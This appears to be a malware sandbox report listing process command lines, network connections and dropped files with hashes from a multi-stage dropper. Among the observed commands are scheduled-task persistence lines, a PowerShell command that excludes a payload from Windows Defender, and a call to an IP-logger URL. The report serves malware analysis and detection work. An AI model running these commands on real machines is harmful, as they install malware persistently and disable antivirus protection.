"C:\Users\Admin\AppData\Local\Temp\a\360TS_Setup_Mini_WW.Peter.CPI202405_6.6.0.1060.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.com/26uSj6

C:\Windows\SysWOW64\tar.exe

tar -xf putty.zip

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0x100,0x128,0x7ff8520346f8,0x7ff852034708,0x7ff852034718

C:\Users\Admin\AppData\Local\Temp\putty\putty.exe

C:\Users\Admin\AppData\Local\Temp\putty\putty.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2040,6098613852097135989,12193692332369972990,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2012 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2040,6098613852097135989,12193692332369972990,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2264 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2040,6098613852097135989,12193692332369972990,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2832 /prefetch:8

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,6098613852097135989,12193692332369972990,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3364 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,6098613852097135989,12193692332369972990,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3392 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MPGPH2663\MPGPH2663.exe" /tn "MPGPH2663 HR" /sc HOURLY /rl HIGHEST

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MPGPH2663\MPGPH2663.exe" /tn "MPGPH2663 LG" /sc ONLOGON /rl HIGHEST

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,6098613852097135989,12193692332369972990,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4972 /prefetch:1

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\a\New.exe" -Force

C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"

C:\Users\Admin\AppData\Local\Temp\svchost.exe

"C:\Users\Admin\AppData\Local\Temp\svchost.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 urlhaus.abuse.ch udp
US 151.101.2.49:443 urlhaus.abuse.ch tcp
RU 147.45.47.70:80 147.45.47.70 tcp
US 8.8.8.8:53 49.2.101.151.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 70.47.45.147.in-addr.arpa udp
US 8.8.8.8:53 97.90.14.23.in-addr.arpa udp
CN 124.71.81.174:80 tcp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 f.123654987.xyz udp
LT 176.223.130.167:80 176.223.130.167 tcp
LT 176.223.130.167:80 176.223.130.167 tcp
LT 176.223.130.167:80 176.223.130.167 tcp
LT 176.223.130.167:80 176.223.130.167 tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 167.130.223.176.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
N/A 192.168.1.2:1800 tcp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
N/A 127.0.0.1:2404 tcp
N/A 127.0.0.1:2404 tcp
N/A 127.0.0.1:2404 tcp
DE 49.13.194.118:80 49.13.194.118 tcp
RU 5.42.66.47:80 5.42.66.47 tcp
US 8.8.8.8:53 118.194.13.49.in-addr.arpa udp
US 8.8.8.8:53 47.66.42.5.in-addr.arpa udp
US 8.8.8.8:53 free.360totalsecurity.com udp
NL 151.236.127.172:443 free.360totalsecurity.com tcp
MD 94.103.188.126:80 94.103.188.126 tcp
US 8.8.8.8:53 172.127.236.151.in-addr.arpa udp
US 8.8.8.8:53 126.188.103.94.in-addr.arpa udp
US 8.8.8.8:53 softcatalog.ru udp
RU 88.212.252.98:443 softcatalog.ru tcp
US 8.8.8.8:53 98.252.212.88.in-addr.arpa udp
US 8.8.8.8:53 st.p.360safe.com udp
US 8.8.8.8:53 s.360safe.com udp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 iup.360safe.com udp
N/A 127.0.0.1:2404 tcp
US 8.8.8.8:53 tr.p.360safe.com udp
IE 54.77.42.29:3478 st.p.360safe.com udp
IE 54.77.42.29:3478 st.p.360safe.com udp
NL 151.236.127.172:80 iup.360safe.com tcp
NL 151.236.127.172:80 iup.360safe.com tcp
NL 151.236.127.172:80 iup.360safe.com tcp
NL 151.236.127.172:80 iup.360safe.com tcp
NL 151.236.127.172:80 iup.360safe.com tcp
DE 52.29.179.141:80 s.360safe.com tcp
IE 54.76.174.118:80 tr.p.360safe.com udp
NL 151.236.127.172:80 iup.360safe.com tcp
US 8.8.8.8:53 29.42.77.54.in-addr.arpa udp
US 8.8.8.8:53 141.179.29.52.in-addr.arpa udp
US 8.8.8.8:53 118.174.76.54.in-addr.arpa udp
DE 52.29.179.141:80 s.360safe.com tcp
US 8.8.8.8:53 int.down.360safe.com udp
US 8.8.8.8:53 iplogger.com udp
US 104.21.76.57:443 iplogger.com tcp
US 8.8.8.8:53 www.google.com udp
GB 142.250.187.196:443 www.google.com tcp
US 104.192.108.21:80 int.down.360safe.com tcp
US 104.192.108.17:80 int.down.360safe.com tcp
US 104.192.108.20:80 int.down.360safe.com tcp
US 104.192.108.20:80 int.down.360safe.com tcp
US 104.192.108.17:80 int.down.360safe.com tcp
GB 142.250.187.196:443 www.google.com udp
SG 118.194.235.187:50500 tcp
US 8.8.8.8:53 57.76.21.104.in-addr.arpa udp
US 8.8.8.8:53 196.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 21.108.192.104.in-addr.arpa udp
US 8.8.8.8:53 17.108.192.104.in-addr.arpa udp
US 8.8.8.8:53 20.108.192.104.in-addr.arpa udp
US 104.192.108.21:80 int.down.360safe.com tcp
US 8.8.8.8:53 sd.p.360safe.com udp
GB 18.165.158.188:80 sd.p.360safe.com tcp
US 8.8.8.8:53 ogs.google.com udp
US 8.8.8.8:53 apis.google.com udp
GB 142.250.200.14:443 apis.google.com tcp
GB 142.250.187.238:443 ogs.google.com tcp
US 8.8.8.8:53 ssl.gstatic.com udp
GB 172.217.169.3:443 ssl.gstatic.com tcp
US 8.8.8.8:53 187.235.194.118.in-addr.arpa udp
US 8.8.8.8:53 195.212.58.216.in-addr.arpa udp
US 8.8.8.8:53 188.158.165.18.in-addr.arpa udp
US 8.8.8.8:53 14.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 238.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 play.google.com udp
GB 142.250.179.238:443 play.google.com tcp
GB 142.250.179.238:443 play.google.com udp
US 8.8.8.8:53 99.201.58.216.in-addr.arpa udp
US 8.8.8.8:53 238.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 3.169.217.172.in-addr.arpa udp
N/A 127.0.0.1:2404 tcp

Files

memory/2960-0-0x00007FF8598C3000-0x00007FF8598C5000-memory.dmp

memory/2960-1-0x0000000000F50000-0x0000000000F58000-memory.dmp

memory/2960-2-0x00007FF8598C0000-0x00007FF85A381000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\a\volumeinfo.exe

MD5 e817cc929fbc651c5bdab9e8cca0d9d9
SHA1 4d73dc2afcde6a1dcf9417c0120252a2d8fd246f
SHA256 3a7327bd54ba0dfa36bbf0b9d0dc820984d6d0e0316cfa4045ab4c1e7e447282
SHA512 a9c1e547ef74c20e0a21dfc951463fb6883a23da4c323c96c5e64ac5793e774ceae898d4cf486e1bf1ea8fb69360610639a1046005fcdb9bd9f8463aec4a3e2f

memory/3624-14-0x000000007514E000-0x000000007514F000-memory.dmp

memory/3624-15-0x0000000000E20000-0x0000000001060000-memory.dmp

memory/3624-16-0x0000000075140000-0x00000000758F0000-memory.dmp

memory/3624-18-0x0000000006D30000-0x0000000006F4E000-memory.dmp

memory/3624-17-0x00000000059E0000-0x0000000005BFC000-memory.dmp

memory/3624-19-0x0000000007530000-0x0000000007AD4000-memory.dmp

memory/3624-20-0x0000000007020000-0x00000000070B2000-memory.dmp

memory/3624-21-0x0000000006D30000-0x0000000006F48000-memory.dmp

memory/3624-22-0x0000000006D30000-0x0000000006F48000-memory.dmp

memory/3624-29-0x0000000006D30000-0x0000000006F48000-memory.dmp

memory/3624-56-0x0000000006D30000-0x0000000006F48000-memory.dmp

memory/3624-58-0x0000000006D30000-0x0000000006F48000-memory.dmp

memory/3624-76-0x0000000006D30000-0x0000000006F48000-memory.dmp

memory/3624-84-0x0000000006D30000-0x0000000006F48000-memory.dmp

memory/3624-82-0x0000000006D30000-0x0000000006F48000-memory.dmp

memory/3624-80-0x0000000006D30000-0x0000000006F48000-memory.dmp

memory/3624-78-0x0000000006D30000-0x0000000006F48000-memory.dmp

memory/3624-74-0x0000000006D30000-0x0000000006F48000-memory.dmp

memory/3624-72-0x0000000006D30000-0x0000000006F48000-memory.dmp

memory/3624-70-0x0000000006D30000-0x0000000006F48000-memory.dmp

memory/3624-68-0x0000000006D30000-0x0000000006F48000-memory.dmp

memory/3624-66-0x0000000006D30000-0x0000000006F48000-memory.dmp

memory/3624-64-0x0000000006D30000-0x0000000006F48000-memory.dmp

memory/3624-62-0x0000000006D30000-0x0000000006F48000-memory.dmp

memory/3624-60-0x0000000006D30000-0x0000000006F48000-memory.dmp

memory/3624-54-0x0000000006D30000-0x0000000006F48000-memory.dmp

memory/3624-52-0x0000000006D30000-0x0000000006F48000-memory.dmp

memory/3624-50-0x0000000006D30000-0x0000000006F48000-memory.dmp

memory/3624-48-0x0000000006D30000-0x0000000006F48000-memory.dmp

memory/3624-46-0x0000000006D30000-0x0000000006F48000-memory.dmp

memory/3624-38-0x0000000006D30000-0x0000000006F48000-memory.dmp

memory/3624-36-0x0000000006D30000-0x0000000006F48000-memory.dmp

memory/3624-34-0x0000000006D30000-0x0000000006F48000-memory.dmp

memory/3624-32-0x0000000006D30000-0x0000000006F48000-memory.dmp

memory/3624-30-0x0000000006D30000-0x0000000006F48000-memory.dmp

memory/3624-44-0x0000000006D30000-0x0000000006F48000-memory.dmp

memory/3624-42-0x0000000006D30000-0x0000000006F48000-memory.dmp

memory/3624-26-0x0000000006D30000-0x0000000006F48000-memory.dmp

memory/3624-40-0x0000000006D30000-0x0000000006F48000-memory.dmp

memory/3624-24-0x0000000006D30000-0x0000000006F48000-memory.dmp

memory/3624-4907-0x0000000075140000-0x00000000758F0000-memory.dmp

memory/3624-4908-0x0000000007270000-0x00000000072C8000-memory.dmp

memory/3624-4909-0x00000000072D0000-0x000000000731C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\a\55.exe

MD5 821f6662f6e721a43d020dc488a4a040
SHA1 d272ea0525684d2466ce0d58ad13a90e28bd1949
SHA256 c86b92d987b2f716cbdf2a772e55de445ce599ddeaecff6e47cef72ac61b0568
SHA512 000b67d9127950369ba6cfb651d20efadcce5b23e1da62a68d20c594e8ad81702e26cc74f5e4eff927727faa0c2a303f5446acb1276a81a47b858a293775ee29

C:\Users\Admin\AppData\Local\Temp\a\3.exe

MD5 2eb0ac82f49347944e4ef29cb53eca48
SHA1 c28c8c943d7ccc805cbc5cdc5f697d1ee3815b0f
SHA256 86c8da270e82ac4d2e27ac6ec56d7dd1df44d2bcb9ce22e008d9647fdba87243
SHA512 6e9f916a6239b27ef4120ffd235409c9476cc49fdecbfff31fc5c15cb5769b39107ea4e1d93c61f60ec3df22ea5d09723a42d6287e7b52f77843357f04a8e327

C:\Users\Admin\AppData\Local\Temp\a\munqk.exe

MD5 dc7b784b8e4f9db78f88cb20dfbda030
SHA1 6045e1d486dd095e43bf4f922500b15e05194719
SHA256 92b62c8fbfb7f3002fbf04c225452381e4323834d6de26ec9b17d9691ef900dc
SHA512 13878e992cb3de1d13e9edd998e3043b692ca4e946bb1581d06943059657312158d70f36702f63fa602666576c6a9c49f9ca14ed0d16c40cabe30066e94c8535

C:\Users\Admin\AppData\Local\Temp\a\17.exe

MD5 7ba50890ab7bfc1dd9e88c182a689fb9
SHA1 33d4767c38e5586511a94ed03900495777bd4029
SHA256 080aaaa296ddc41c2a448d2d39652608994dbe17019cd3fcb081d89ad3acad15
SHA512 92a245d09c4c55c99915a94d762128f4ac3d6c2705d06d2b6c62243c654e9209233b28aa928f10e473672422673febd36281981826a4d361201403a3d56237bf

C:\Users\Admin\AppData\Local\Temp\a\network.exe

MD5 a13c1ec24d6b087a6ac188b0fd254178
SHA1 fbe22171427327ec23240f5bc9896854110f360a
SHA256 7b7f9647dbc512c0f9857332b181991b1e8f6b1ab0634f31d8612ee483d2933f
SHA512 1ab541db748b8817e069d1ff73037e606f2913a57078e2080d60a1fbdb108d7d5b7698b10304ea271a48493432b20a14ac464fa584c0fa6bea27d7c78369acf5

memory/3248-4961-0x0000000002810000-0x0000000002846000-memory.dmp

memory/3248-4970-0x0000000005080000-0x00000000056A8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\a\maikati.exe

MD5 bf0c635d0132b4318ae9dc4bc7269919
SHA1 520708e247e52a5899143a768d36f0544828cadb
SHA256 97464eeb75791bf12ac3c78eeae121d066ef799e33cd4959f13eff4c257776d8
SHA512 77b91bc40734cc0374b250c618360ca7e74c878e6715c60ad6627ce6e94cd9b6b5b92f8ccd52e592bf083903a17e6c8083f3f0783a721e902e57f39ce64f85d3

memory/3248-4984-0x0000000004FC0000-0x0000000005026000-memory.dmp

memory/3248-4983-0x0000000004E20000-0x0000000004E42000-memory.dmp

memory/3248-4985-0x00000000056B0000-0x0000000005716000-memory.dmp

memory/3248-4994-0x00000000057A0000-0x0000000005AF4000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_33kbu4xy.pvi.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3248-5005-0x0000000005E00000-0x0000000005E1E000-memory.dmp

memory/3148-5004-0x0000000000400000-0x0000000000412000-memory.dmp

memory/3248-5006-0x0000000005E30000-0x0000000005E7C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\a\Zinker.exe

MD5 b11913361b2d4c43c00c1969184050a8
SHA1 8358fa3426e4136e0873a32f49f5f367770bad0a
SHA256 de39bc2c5f18ae468501a573ee5cb9b22f2f608ec2fc51954b44d4549fac2a57
SHA512 2d25c021ddf59a10b63c56d85a550e7454767444472f3e40662dda1e1dddeef551202253cf9137bf4054ed832cd59c53b66aba6d42361f044fe4e7b06bef2026

memory/3248-5019-0x00000000063E0000-0x0000000006412000-memory.dmp

memory/3248-5020-0x000000006F820000-0x000000006F86C000-memory.dmp

memory/3248-5031-0x0000000007000000-0x00000000070A3000-memory.dmp

memory/3248-5030-0x0000000006FE0000-0x0000000006FFE000-memory.dmp

memory/3248-5033-0x0000000007120000-0x000000000713A000-memory.dmp

memory/3248-5032-0x0000000007760000-0x0000000007DDA000-memory.dmp

memory/3248-5034-0x0000000007190000-0x000000000719A000-memory.dmp

memory/3248-5035-0x00000000073A0000-0x0000000007436000-memory.dmp

memory/3248-5036-0x0000000007320000-0x0000000007331000-memory.dmp

memory/3248-5037-0x0000000007350000-0x000000000735E000-memory.dmp

memory/3248-5038-0x0000000007360000-0x0000000007374000-memory.dmp

memory/3248-5039-0x0000000007460000-0x000000000747A000-memory.dmp

memory/3248-5040-0x0000000007440000-0x0000000007448000-memory.dmp

memory/2960-5052-0x00007FF8598C3000-0x00007FF8598C5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\a\smartsoftsignew.exe

MD5 66a5a529386533e25316942993772042
SHA1 053d0d7f4cb6e3952e849f02bbfbdb4d39021146
SHA256 713a497c8da97c2082758fd31147539f408a72b62041c6c9ed77037021621e94
SHA512 9f4f69e9d1a3265311cd9f4bb9a254f157e1e0b7536466e88449f410f297d501d10448b170901206fff0ffde6d7e8a50b84e391fd62ff0f9355b506959cc336a

C:\Users\Admin\AppData\Local\Temp\nseC2B5.tmp\UAC.dll

MD5 adb29e6b186daa765dc750128649b63d
SHA1 160cbdc4cb0ac2c142d361df138c537aa7e708c9
SHA256 2f7f8fc05dc4fd0d5cda501b47e4433357e887bbfed7292c028d99c73b52dc08
SHA512 b28adcccf0c33660fecd6f95f28f11f793dc9988582187617b4c113fb4e6fdad4cf7694cd8c0300a477e63536456894d119741a940dda09b7df3ff0087a7eada

C:\Users\Admin\AppData\Local\Temp\nseC2B5.tmp\nsExec.dll

MD5 132e6153717a7f9710dcea4536f364cd
SHA1 e39bc82c7602e6dd0797115c2bd12e872a5fb2ab
SHA256 d29afce2588d8dd7bb94c00ca91cac0e85b80ffa6b221f5ffcb83a2497228eb2
SHA512 9aeb0b3051ce07fb9f03dfee7cea4a5e423425e48cb538173bd2a167817f867a30bd4d27d07875f27ca00031745b24547030b7f146660b049fa717590f1c77e1

C:\Users\Admin\AppData\Local\Temp\putty\Smartscreen.bat

MD5 f6423b02fa9b2de5b162826b26c0dc56
SHA1 01e7e79e6018c629ca11bc30f15a1a3e6988773e
SHA256 59f52a56309ecb5c9c256a88db12a60403e5b0a8c0b8c013e7f6c9c5c395ff83
SHA512 5974e3a1bfe84719a2af614995f821d1c0a751b2ef2b39a3f6087c31dec609eb57d0824a28304e68365b75a0c7a3978aa28ed26c8f392976bd3337c1e8561459

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 968cb9309758126772781b83adb8a28f
SHA1 8da30e71accf186b2ba11da1797cf67f8f78b47c
SHA256 92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA512 4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

C:\Users\Admin\AppData\Local\Temp\a\ADServices.exe

MD5 0c2564813f2b9fc088cfb6938214d3cb
SHA1 cbb0bc2dfe83d38b9e4a8e47d182e6d7ee6a29b0
SHA256 1043faf46b5a19cbe10410e01725b38caf0db7f36b73c68e103ebca8da2d18d2
SHA512 06d4df2ed5d79c1d33ca06d977d936643c78139f484747bdfaac690b84f064620a6dc33014b0146acebce4e935688dc2a1445e7e2f830ec3b75e5e2dafa02ed1

memory/4484-5099-0x0000000006480000-0x00000000067D4000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 97cc569c9c7b2be6e68a9922c460c6c6
SHA1 02e654678b61e1b4c3fe6d14f38240fa09b33627
SHA256 752ca416ea5cd4635b6227bbb5c568d2bcf3c2e0e48c7809aa83e16cbb2dc7fd
SHA512 12e7e08dbc5af14633506a82591b806e0a10616a67f36d996e1c624efc84016366153019257d1d96284a07b5838b2cff776ae2709213ec528d4867d9b826e0f5

memory/4888-5101-0x000000001B7C0000-0x000000001BC8E000-memory.dmp

memory/4484-5102-0x0000000006970000-0x00000000069BC000-memory.dmp

memory/4888-5103-0x000000001B220000-0x000000001B2C6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\a\New.exe

MD5 384cc82bf0255c852430dc13e1069276
SHA1 26467194c29d444e5373dfdde2ff2bca1c12ef9a
SHA256 ba2567627674eada0b5462b673cdea4ed11a063174c87b775927db7e7d6ef99c
SHA512 7838ee81a8d13c3722627424270ac877081afc399be862ce9b1614a1df3c12f98066d28f2a9a81bcf626f14fe90d83ef8039cd679f40851f2d6d83c3839e73be

memory/3688-5115-0x000001E4F8F50000-0x000001E4F8F5A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\a\360TS_Setup_Mini_WW.Peter.CPI202405_6.6.0.1060.exe

MD5 2de14d82238bf5395e0b95e551ab8e00
SHA1 f9c7f00ad7c624d190e06cda3c5adf02bb207074
SHA256 aa9d5004f89fe3952e5ee0b148e6a36574d372bb5ffadae5733a7ee77127f8d4
SHA512 9a5f2f781b52ea793021bf641a8be95f9611bfe936e9bd96978ec9066b4a7390b847f2e597cfd9ac69de9ac35b7238147538a23c3a27313d19c16258e2446f2a

memory/2960-5125-0x00007FF8598C0000-0x00007FF85A381000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\{D9B79AAE-9C59-4341-BA35-F85D0FF2FE33}.tmp\360P2SP.dll

MD5 fc1796add9491ee757e74e65cedd6ae7
SHA1 603e87ab8cb45f62ecc7a9ef52d5dedd261ea812
SHA256 bf1b96f5b56be51e24d6314bc7ec25f1bdba2435f4dfc5be87de164fe5de9e60
SHA512 8fa2e4ff5cbc05034051261c778fec1f998ceb2d5e8dea16b26b91056a989fdc58f33767687b393f32a5aff7c2b8d6df300b386f608abd0ad193068aa9251e0d

C:\Users\Admin\AppData\Local\Temp\putty.zip

MD5 188fbf5c7b5748e1f750be2bab44e0a0
SHA1 525afccfc532830f71f068acfbf9ac49a1463539
SHA256 14a23a25c21deba6f3a85d2e24085a95881302499bcdde6dc9a585fe46b9f370
SHA512 62d6232ec09e266585f29c9fe335a6f02cfc0dbd8aa02545b0648eec7424aa25c4138cff49015073aede2a45506c056cbaa592cfc5d3a537313d9ee5bf1c6608

C:\Users\Admin\AppData\Local\Temp\putty\putty.exe

MD5 7a9a33206f80078ba80f7a839cd92451
SHA1 55447378c48561c35bad1317b58a34ee50c5072f
SHA256 e53c379d95e95706c5a2c4d6cd609857368a3bf14f28d7e67f6e3f8dfce6d486
SHA512 61873ed9b7616de998eff2ca90c6698cb0df87d181344fc6e02fd70fcd87fd8028cfdb7f606a3637514463982c161549729145118190e42b7f47365716f23aba

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 ea98e583ad99df195d29aa066204ab56
SHA1 f89398664af0179641aa0138b337097b617cb2db
SHA256 a7abb51435909fa2d75c6f2ff5c69a93d4a0ab276ed579e7d8733b2a63ffbee6
SHA512 e109be3466e653e5d310b3e402e1626298b09205d223722a82344dd78504f3c33e1e24e8402a02f38cd2c9c50d96a303ce4846bea5a583423937ab018cd5782f

\??\pipe\LOCAL\crashpad_1648_OHBPTTCBIUVHGZCH

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 4f7152bc5a1a715ef481e37d1c791959
SHA1 c8a1ed674c62ae4f45519f90a8cc5a81eff3a6d7
SHA256 704dd4f98d8ca34ec421f23ba1891b178c23c14b3301e4655efc5c02d356c2bc
SHA512 2e6b02ca35d76a655a17a5f3e9dbd8d7517c7dae24f0095c7350eb9e7bdf9e1256a7009aa8878f96c89d1ea4fe5323a41f72b8c551806dda62880d7ff231ff5c

C:\Users\Admin\AppData\Local\Temp\[email protected]\setup.ini

MD5 e6edb41c03bce3f822020878bde4e246
SHA1 03198ad7bbfbdd50dd66ab4bed13ad230b66e4d9
SHA256 9fa80f0889358d9db3d249a2e747e27b7c01c6123b784d94d169c0e54cacf454
SHA512 2d71b7d50212f980e82562af95598c430aa0875f7a9d9cc670ba2cb1f63057fb26fd747a99cb4ca08f2355d002daa79bda2236b3ad9e37a3cfef32ae5420e2a1

C:\Users\Admin\AppData\Local\Temp\[email protected]

MD5 184a117024f3789681894c67b36ce990
SHA1 c5b687db3b27ef04ad2b2cbc9f4e523cb7f6ba7e
SHA256 b10d5fef165fc89e61cd16e02eac1b90b8f94ef95218bdd4b678cd0d5c8a925e
SHA512 354d3bbc1329cbbe30d22f0cf95564e44acc68d6fe91e2beb4584a473d320faf4c092de9db7f1f93cf0b235703fc8de913883985c7d5db6b596244771a1edaf7

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 f35ebabea3c72e7e3592d8579466e809
SHA1 5dba94f1ac3ff3dc53ec551045989688870911b3
SHA256 a4ecc4d400e6f657d6eaab20b2a1a65879266dec7ce55b1df04d89eddf6e4017
SHA512 7f3fa07e231ea803ac400706a5be9c8678f8fba6c718335c35e13983b281488737037e663a65842888bf4bf18f50434c5bc0b401f80913fb23e02b27825a18ab

memory/3688-5193-0x000001E4FB740000-0x000001E4FB7A8000-memory.dmp

memory/5500-5251-0x0000000000400000-0x0000000000416000-memory.dmp

memory/5280-5254-0x0000017964810000-0x0000017964832000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 3156cafb50c37e6491b22084c60d4ce0
SHA1 c148c1217e3eed6ec3acaf8a9a020dc036d7d8f7
SHA256 a3eeca9076a1efaa46c5f63e4cd12fe84766a46f6c7013aa1f2f4bf361543010
SHA512 968186a0a54ec1e107ea914f9de28cf677c6674093ea179eed03c0448fa19c40fbbb421fdc13101d49ab213760812ef7c792102d1b8e41421c8462c483bf3a06